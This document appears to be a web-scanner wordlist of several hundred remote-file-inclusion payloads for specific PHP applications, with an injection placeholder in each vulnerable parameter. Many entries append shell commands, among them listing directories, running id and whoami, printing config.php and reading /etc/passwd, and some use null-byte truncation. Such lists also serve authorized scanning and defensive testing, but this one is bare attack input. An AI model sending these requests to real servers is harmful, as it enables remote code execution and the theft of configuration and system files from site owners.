/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=!INJECT!
/plus.php?_pages_dir=!INJECT!?
/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=!INJECT!?
/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!
/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!?
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=!INJECT!
/poll/view.php?int_path=!INJECT!
/pollvote.php?pollname=!INJECT!?&cmd=ls
/pop.php?base=!INJECT!
/popup_window.php?site_isp_root=!INJECT!?
/port.php?content=!INJECT!
/portal/includes/portal_block.php?phpbb_root_path=!INJECT!
/portal/portal.php?phpbb_root_path=!INJECT!?
/portfolio.php?id=!INJECT!
/portfolio/commentaires/derniers_commentaires.php?rep=!INJECT!?
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=!INJECT!
/prepare.php?xcart_dir=!INJECT!?
/prepend.php?_PX_config[manager_path]=!INJECT!
/preview.php?php_script_path=!INJECT!?&cmd=dir
/principal.php?conteudo=!INJECT!
/print.php?page=!INJECT!
/print.php?pager=!INJECT!
/print.php?print=!INJECT!?
/process.php?DEFAULT_SKIN=!INJECT!
/professeurs/index.php?repertoire_config=!INJECT!
/profil.php?config[root_ordner]=!INJECT!?&cmd=id
/projects/weatimages/demo/index.php?ini[langpack]=!INJECT!
/promocms/newspublish/include.php?path[bdocroot]=!INJECT!
/protection.php?logout_page=!INJECT!?
/provider/auth.php?xcart_dir=!INJECT!?
/psynch/nph-psa.exe?css=!INJECT!
/psynch/nph-psf.exe?css=!INJECT!
/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=!INJECT!?
/public_html/modules/Forums/favorites.php?nuke_bb_root_path=!INJECT!?
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=!INJECT!
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=!INJECT!
/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=!INJECT!?
/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=!INJECT!?
/qte_web.php?qte_web_path=!INJECT!?
/quick_reply.php?phpbb_root_path=!INJECT!&mode=[file]
/quickie.php?QUICK_PATH=!INJECT!?&cmd=id
/random2.php?path_to_folder=!INJECT!
/randshop/index.php?incl=!INJECT!?
/rdf.php?page[path]=!INJECT!?&cmd=ls
/reactivate.php?base_dir=!INJECT!
/read.php?data=!INJECT!?
/readmore.php?config["sipssys"]=!INJECT!
/recent.php?insPath=!INJECT!
/rechnung.php?_PHPLIB[libdir]=!INJECT!?
/reconfig.php?GLOBALS[CLPath]=!INJECT!
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=!INJECT!
/redirect.php?url=!INJECT!
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=!INJECT!
/register.php?base_dir=!INJECT!
/releasenote.php?mosConfig_absolute_path=!INJECT!
/rempass.php?lang=!INJECT!
/report.php?scriptpath=!INJECT!?
/reports/who_r.php?bj=!INJECT!
/resources/includes/class.Smarty.php?cfg[sys][base_path]=!INJECT!
/ressourcen/dbopen.php?home=!INJECT!?
/robotstats.inc.php?DOCUMENT_ROOT=!INJECT!?
/root/public/code/cp_html2txt.php?page=!INJECT!
/routines/fieldValidation.php?jssShopFileSystem=!INJECT!
/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!
/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!?
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!?
/rss.php?page[path]=!INJECT!?&cmd=ls
/rss.php?phpraid_dir=!INJECT!
/rss.php?premodDir=!INJECT!
/rss2.php?page[path]=!INJECT!?&cmd=ls
/run.php?dir=SHELL?&file=!INJECT!
/s01.php?shopid=!INJECT!
/s01.php?shopid=!INJECT!?
/s02.php?shopid=!INJECT!?
/s03.php?shopid=!INJECT!?
/s04.php?shopid=!INJECT!?
/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=!INJECT!
/sablonlar/gunaysoft/gunaysoft.php?sayfaid=!INJECT!
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!?
/sample/xls2mysql/parser_path=!INJECT!?
/save.php?file_save=!INJECT!
/saveserver.php?thisdir=!INJECT!
/script//ident/index.php?path_inc=!INJECT!
/script/_conf/core/common-tpl-vars.php?confdir=!INJECT!?
/script/common.inc.php?path_inc=!INJECT!
/script/gestion/index.php?path_inc=!INJECT!
/script/ident/disconnect.php?path_inc=!INJECT!
/script/ident/ident.inc.php?path_inc=!INJECT!
/script/ident/identification.php?path_inc=!INJECT!
/script/ident/loginliste.php?path_inc=!INJECT!
/script/ident/loginmodif.php?path_inc=!INJECT!
/script/index.php?path_inc=!INJECT!
/script/init/createallimagecache.php?PATH_TO_CODE=!INJECT!
/script/menu/menuadministration.php?path_inc=!INJECT!
/script/menu/menuprincipal.php?path_inc=!INJECT!
/script/param/param.inc.php?path_inc=!INJECT!
/script/plugins/phpgacl/admin/index.php?path_inc=!INJECT!
/script/template/index.php?main_page_directory=!INJECT!
/script/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
/script/tick/test.php?PATH_TO_CODE=!INJECT!
/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=!INJECT!?
/script_path/cms/classes/openengine/filepool.php?oe_classpath=!INJECT!?
/script_path/installation/index.php?mosConfig_absolute_path=!INJECT!?
/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=!INJECT!
/scripts/check-lom.php?ETCDIR=!INJECT!
/scripts/gallery.scr.php?GLOBALS[PTH][func]=!INJECT!?
/scripts/lom_update.php?ETCDIR=!INJECT!
/scripts/news.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/polls.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/rss.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/search.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=!INJECT!?
/scripts/weigh_keywords.php?ETCDIR=!INJECT!
/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=!INJECT!?
/search.php?config["sipssys"]=!INJECT!
/search.php?id=!INJECT!
/search.php?insPath=!INJECT!
/search/submit.php?config["sipssys"]=!INJECT!
/search_wA.php?LIBPATH=!INJECT!
/searchbot.php?path=!INJECT!
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=!INJECT!
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=!INJECT!?
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=!INJECT!?
/senetman/html/index.php?page=!INJECT!
/services.php?page=!INJECT!
/services/samples/inclusionService.php?CabronServiceFolder=!INJECT!%00
/settings.php?P[includes]=!INJECT!
/settings_sql.php?path=!INJECT!
/setup/inc/database.php?tcms_administer_site=!INJECT!
/setup/upgrader.php?RootDirectory=!INJECT!
/sezhoo/SezHooTabsAndActions.php?IP=!INJECT!
/shop/includes/header.inc.php?dateiPfad=!INJECT!
/shop/index.php?action=!INJECT!?&cmd=cat%20config.php
/shop/page.php?osCsid=!INJECT!?
/shop/page.php?pageid=!INJECT!?
/shoutbox.php?language=!INJECT!
/shoutbox.php?root=!INJECT!?cmd=id
/show.php?file=!INJECT!
/show.php?id=!INJECT!
/show.php?page=!INJECT!
/show.php?path=!INJECT!
/show_archives.php?cutepath=!INJECT!?
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=!INJECT!
/sid=!INJECT!
/signer/final.php?smiley=!INJECT!?
/signin.php?sent=1&AMG_serverpath=!INJECT!
/sinagb.php?fuss=!INJECT!
/sinapis.php?fuss=!INJECT!
/sitebar/Integrator.php?file=!INJECT!
/sitebar/index.php?writerFile=!INJECT!
/sitebuilder/admin/top.php?admindir=!INJECT!
/sitemap.xml.php?dir[classes]=!INJECT!
/skin/board/default/doctype.php?dir=!INJECT!
/skin/dark/template.php?path=!INJECT!
/skin/gold/template.php?path=!INJECT!
/skin/html/table.php?pachtofile=!INJECT!
/skin/original/template.php?path=!INJECT!
/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=!INJECT!
/skins/advanced/advanced1.php?pluginpath[0]=!INJECT!
/skins/default.php?dir_inc=!INJECT!
/skins/header.php?ote_home=!INJECT!
/skins/phpchess/layout_admin_cfg.php?Root_Path=!INJECT!
/skins/phpchess/layout_cfg.php?Root_Path=!INJECT!
/skins/phpchess/layout_t_top.php?Root_Path=!INJECT!
/skysilver/login.tpl.php?theme=!INJECT!?
/slogin_lib.inc.php?slogin_path=!INJECT!?
/smarty.php?xcart_dir=!INJECT!?
/smarty/smarty_class.php?_smarty_compile_path=!INJECT!
/smilies.php?config=!INJECT!
/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!?
/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=!INJECT!?
/snort/base_stat_common.php?BASE_path=!INJECT!
/social_game_play.php?path=!INJECT!?
/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=!INJECT!
/song.php?phpbb_root_path=!INJECT!
/source.php?bibtexrootrel=!INJECT!?
/source/mod/rss/channeledit.php?Codebase=!INJECT!
/source/mod/rss/post.php?Codebase=!INJECT!
/source/mod/rss/view.php?Codebase=!INJECT!
/source/mod/rss/viewitem.php?Codebase=!INJECT!
/sources/Admin/admin_cats.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_edit.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_import.php?CONFIG[main_path]=!INJECT!
/sources/Admin/admin_templates.php?CONFIG[main_path]=!INJECT!
/sources/functions.php?CONFIG[main_path]=!INJECT!
/sources/help.php?CONFIG[main_path]=!INJECT!
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=!INJECT!
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=!INJECT!
/sources/mail.php?CONFIG[main_path]=!INJECT!
/sources/misc/new_day.php?path=!INJECT!
/sources/news.php?CONFIG[main_path]=!INJECT!
/sources/post.php?fil_config=!INJECT!
/sources/template.php?CONFIG[main_path]=!INJECT!
/sources/tourney/index.php?page=!INJECT!?
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=!INJECT!
/spaw/spaw_control.class.php?spaw_root=!INJECT!
/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=!INJECT!
/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=!INJECT!
/spellcheckwindowframeset.php?SpellIncPath=!INJECT!
/squirrelcart/cart_content.php?cart_isp_root=!INJECT!
/src/ark_inc.php?cfg_pear_path=!INJECT!?
/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=!INJECT!
/src/scripture.php?pageHeaderFile=!INJECT!?
/starnet/themes/c-sky/main.inc.php?cmsdir=!INJECT!?
/start.php?lang=!INJECT!
/start.php?pg=!INJECT!
/stat_modules/users_age/module.php?phpbb_root_path=!INJECT!
/stats.php?vwar_root=!INJECT!
/stphpapplication.php?STPHPLIB_DIR=!INJECT!
/stphpbtnimage.php?STPHPLIB_DIR=!INJECT!
/stphpform.php?STPHPLIB_DIR=!INJECT!
/str.php?p=!INJECT!
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=!INJECT!?
/strload.php?LangFile=!INJECT!
/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=!INJECT!?
/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=!INJECT!?
/styles.php?toroot=!INJECT!
/styles/default/global_header.php?installed=23&domain=!INJECT!
/submit_abuse.php?path_prefix=!INJECT!
/submit_comment.php?path_prefix=!INJECT!
/subscp.php?phpbb_root_path=!INJECT!?
/suite/index.php?pg=!INJECT!?
/supasite/admin_auth_cookies.php?supa[db_path]=!INJECT!
/supasite/admin_mods.php?supa[db_path]=!INJECT!
/supasite/admin_news.php?supa[db_path]=!INJECT!
/supasite/admin_settings.php?supa[include_path]=!INJECT!
/supasite/admin_topics.php?supa[db_path]=!INJECT!
/supasite/admin_users.php?supa[db_path]=!INJECT!
/supasite/admin_utilities.php?supa[db_path]=!INJECT!
/supasite/backend_site.php?supa[include_path]=!INJECT!
/supasite/common_functions.php?supa[db_path]=!INJECT!
/supasite/site_comment.php?supa[db_path]=!INJECT!
/supasite/site_news.php?supa[db_path]=!INJECT!
/support/include/open_form.php?include_dir=!INJECT!?cmd=pwd
/support/index.php?main=!INJECT!
/surveys/survey.inc.php?path=!INJECT!
/sw/lib_comment/comment.php?doc_directory=!INJECT!?
/sw/lib_find/find.php?doc_directory=!INJECT!?
/sw/lib_session/session.php?doc_directory=!INJECT!?
/sw/lib_up_file/file.php?doc_directory=!INJECT!?
/sw/lib_up_file/find_file.php?doc_directory=!INJECT!?
/sw/lib_user/find_user.php?doc_directory=!INJECT!?
/sw/lib_user/user.php?doc_directory=!INJECT!?
/sys/code/box.inc.php?config["sipssys"]=!INJECT!
/system/ImageImageMagick.php?glConf[path_system]=!INJECT!?
/system/_b/contentFiles/gBIndex.php?gBRootPath=!INJECT!?
/system/admin/include/item_main.php?GLOBALS=!INJECT!
/system/admin/include/upload_form.php?GLOBALS=!INJECT!
/system/command/admin.cmd.php?GLOBALS=!INJECT!
/system/command/download.cmd.php?GLOBALS=!INJECT!
/system/funcs/xkurl.php?PEARPATH=!INJECT!
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=!INJECT!
/system/login.php?site_path=!INJECT!
/tagit2b/tagmin/delTagUser.php?configpath=!INJECT!?
/tags.php?BBCodeFile=!INJECT!
/taxonservice.php?dir=!INJECT!?
/teatro/pub/pub08_comments.php?basePath=!INJECT!
/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=!INJECT!?
/template.php?actionsPage=!INJECT!?
/template.php?blog_theme=!INJECT!
/template.php?pagina=!INJECT!
/template/Noir/index.php?site_path=!INJECT!
/template/Vert/index.php?pageAll=!INJECT!
/template/Vert/index.php?site_path=!INJECT!
/template/barnraiser_01/p_new_password.tpl.php?templatePath=!INJECT!
/template/default/footer.php?ROOT_PATH=!INJECT!?cmd=ls
/template/default/test/header.php?ROOT_PATH=!INJECT!?cmd=ls
/template/gwb/user_bottom.php?config[template_path]=!INJECT!
/template/purpletech/base_include.php?page=!INJECT!?
/template/rwb/user_bottom.php?config[template_path]=!INJECT!
/template_csv.php?rInfo[content]=!INJECT!
/templates/2blue/bodyTemplate.php?serverPath=!INJECT!?
/templates/Official/part_userprofile.php?template_path=!INJECT!
/templates/barrel/template.tpl.php?renderer=!INJECT!
/templates/barrel/template.tpl.php?renderer=!INJECT!?
/templates/barry/template.tpl.php?renderer=!INJECT!
/templates/be2004-2/index.php?mosConfig_absolute_path=!INJECT!
/templates/datumVonDatumBis.inc.php?root=!INJECT!
/templates/default/header.inc.php?menu=!INJECT!
/templates/default/index_logged.php?main_loaded=1&cur_module=!INJECT!
/templates/default/tpl_message.php?right_file=!INJECT!
/templates/footer.inc.php?root=!INJECT!
/templates/header.inc.php?root=!INJECT!
/templates/mylook/template.tpl.php?renderer=!INJECT!
/templates/oerdec/template.tpl.php?renderer=!INJECT!
/templates/pb/language/lang_nl.php?temppath=!INJECT!
/templates/penguin/template.tpl.php?renderer=!INJECT!
/templates/sidebar/template.tpl.php?renderer=!INJECT!
/templates/slashdot/template.tpl.php?renderer=!INJECT!
/templates/stylesheets.php?root=!INJECT!
/templates/text-only/template.tpl.php?renderer=!INJECT!
/templates/tmpl_dfl/scripts/index.php?dir[inc]=!INJECT!
/theme/breadcrumb.php?rootBase=!INJECT!?
/theme/default.php?root=!INJECT!
/theme/format.php?_page_content=!INJECT!?
/theme/format.php?_page_css=!INJECT!?
/theme/frames1.php?root=!INJECT!
/theme/frames1_center.php?root=!INJECT!
/theme/frames1_left.php?root=!INJECT!
/theme/frames1_top.php?root=!INJECT!
/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=!INJECT!
/theme/settings.php?pfad_z=!INJECT!
/theme/test1.php?root=!INJECT!
/theme/test2.php?root=!INJECT!
/theme/test3.php?root=!INJECT!
/theme/test4.php?root=!INJECT!
/theme/test5.php?root=!INJECT!
/theme/test6.php?root=!INJECT!
/themes.php?GLOBALS[theme_path]=!INJECT!?
/themes/blackorange.php?root=!INJECT!
/themes/container.php?theme_directory=!INJECT!%00
/themes/default/layouts/standard.php?page_include=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/themes/default/preview_post_completo.php?dir=!INJECT!
/themes/header.php?theme_directory=!INJECT!%00
/themes/ubb/login.php?theme=!INJECT!
/themes/ubb/login.php?theme=!INJECT!?
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=!INJECT!
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=!INJECT!
/timedifference.php?la=!INJECT!
/toolbar.loudmouth.php?mainframe=!INJECT!
/tools/update_translations.php?_SESSION[path]=!INJECT!?
/top.php?laypath=!INJECT!
/toplist.php?f=toplist_top10&phpbb_root_path=!INJECT!
/topsites/index.php?page=!INJECT!?&
/towels-0.1/src/scripture.php?pageHeaderFile=!INJECT!
/track.php?path=!INJECT!
/tsep/include/colorswitch.php?tsep_config[absPath]=!INJECT!?
/ttCMS_path/lib/db/ez_sql.php?lib_path=!INJECT!
/twebs/modules/misc/usermods.php?ROOT=!INJECT!
/ubbt.inc.php?GLOBALS[thispath]=!INJECT!?
/unavailable.php?bibtexrootrel=!INJECT!?
/unsubs.php?scdir=!INJECT!
/up.php?my[root]=!INJECT!
/upload.php?save_path=!INJECT!?
/upload/admin/frontpage_right.php?loadadminpage=!INJECT!?
/upload/top.php?maindir=!INJECT!?
/upload/xax/admin/modules/install_module.php?level=!INJECT!?
/upload/xax/admin/patch/index.php?level=!INJECT!?
/upload/xax/ossigeno/admin/install_module.php?level=!INJECT!?
/upload/xax/ossigeno/admin/uninstall_module.php?level=!INJECT!?
/upload_local.php?target=!INJECT!?
/upload_multi.php?target=!INJECT!?
/urlinn_includes/config.php?dir_ws=!INJECT!?
/user.php?caselist[bad_file.txt][path]=!INJECT!&command=cat%20/etc/passwd
/user_language.php?INDM=r3d.w0rm&language_dir=!INJECT!?
/user_new_2.php?home=!INJECT!
/usr/extensions/get_calendar.inc.php?root_path=!INJECT!
/usr/extensions/get_infochannel.inc.php?root_path=!INJECT!?cmd=id;pwd
/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=!INJECT!
/utilitaires/gestion_sondage.php?repertoire_visiteur=!INJECT!
/utils/class_HTTPRetriever.php?libcurlemuinc=!INJECT!
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=!INJECT!
/vCard/admin/define.inc.php?match=!INJECT!?&cmd=id
/vb/includes/functions.php?classfile=!INJECT!
/vb/includes/functions_cron.php?nextitem=!INJECT!
/vb/includes/functions_forumdisplay.php?specialtemplates=!INJECT!
/vbgsitemap/vbgsitemap-config.php?base=!INJECT!
/vbgsitemap/vbgsitemap-vbseo.php?base=!INJECT!
/vedit/editor/edit_htmlarea.php?highlighter=!INJECT!?
/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=!INJECT!?
/view.php?ariadne=!INJECT!?
/view.php?id=!INJECT!
/view_func.php?i=!INJECT!&l=testfile.txt?
/views/print/printbar.php?views_path=!INJECT!
/visible_count_inc.php?statitpath=!INJECT!
/visitor.php?_SERVER[DOCUMENT_ROOT]=!INJECT!??
/volume.php?config[public_dir]=!INJECT!?
/vote.php?Madoa=!INJECT!?
/votebox.php?VoteBoxPath=!INJECT!
/vp/configure.php?phpbb_root_path=!INJECT!?
/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
/w-agora_path/add_user.php?bn_dir_default=!INJECT!?
/w-agora_path/create_forum.php?bn_dir_default=!INJECT!?
/w-agora_path/create_user.php?bn_dir_default=!INJECT!?
/w-agora_path/delete_notes.php?bn_dir_default=!INJECT!?
/w-agora_path/delete_user.php?bn_dir_default=!INJECT!?
/w-agora_path/edit_forum.php?bn_dir_default=!INJECT!?
/w-agora_path/mail_users.php?bn_dir_default=!INJECT!?
/w-agora_path/moderate_notes.php?bn_dir_default=!INJECT!?
/w-agora_path/reorder_forums.php?bn_dir_default=!INJECT!?
/wamp_dir/setup/yesno.phtml?no_url=!INJECT!?
/wapchat/src/eng.adCreate.php?sysFileDir=!INJECT!
/wapchat/src/eng.adCreateSave.php?sysFileDir=!INJECT!
/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=!INJECT!
/wapchat/src/eng.createRoom.php?sysFileDir=!INJECT!
/wapchat/src/eng.forward.php?sysFileDir=!INJECT!
/wapchat/src/eng.pageLogout.php?sysFileDir=!INJECT!
/wapchat/src/eng.resultMember.php?sysFileDir=!INJECT!
/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=!INJECT!
/wapchat/src/eng.saveNewRoom.php?sysFileDir=!INJECT!
/wapchat/src/eng.searchMember.php?sysFileDir=!INJECT!
/wapchat/src/eng.writeMsg.php?sysFileDir=!INJECT!
/war.php?vwar_root=!INJECT!
/warn.php?file=!INJECT!
/watermark.php?GALLERY_BASEDIR=!INJECT!
/wbxml/WBXML/Decoder.php?base_dir=!INJECT!
/wbxml/WBXML/Encoder.php?base_dir=!INJECT!
/web/Administration/Includes/configureText.php?path_prefix=!INJECT!
/web/Administration/Includes/contentHome.php?path_prefix=!INJECT!
/web/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
/web/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
/web/Administration/Includes/userHome.php?path_prefix=!INJECT!
/web/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix!INJECT!
/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path!INJECT!
/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
/web/Flickrclient.php?path_prefix=!INJECT!
/web/help.php?LIBSDIR=!INJECT!
/web/includes/blogger.php?path_prefix=!INJECT!
/web/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
/web/includes/functions/html_generate.php?path_prefix=!INJECT!
/web/includes/functions/validations.php?path_prefix=!INJECT!
/web/index.php?LIBSDIR=!INJECT!
/web/lib/xml/oai/ListRecords.php?xml_dir=!INJECT!
/web/login.php?LIBSDIR=!INJECT!
/web/logout.php?LIBSDIR=!INJECT!
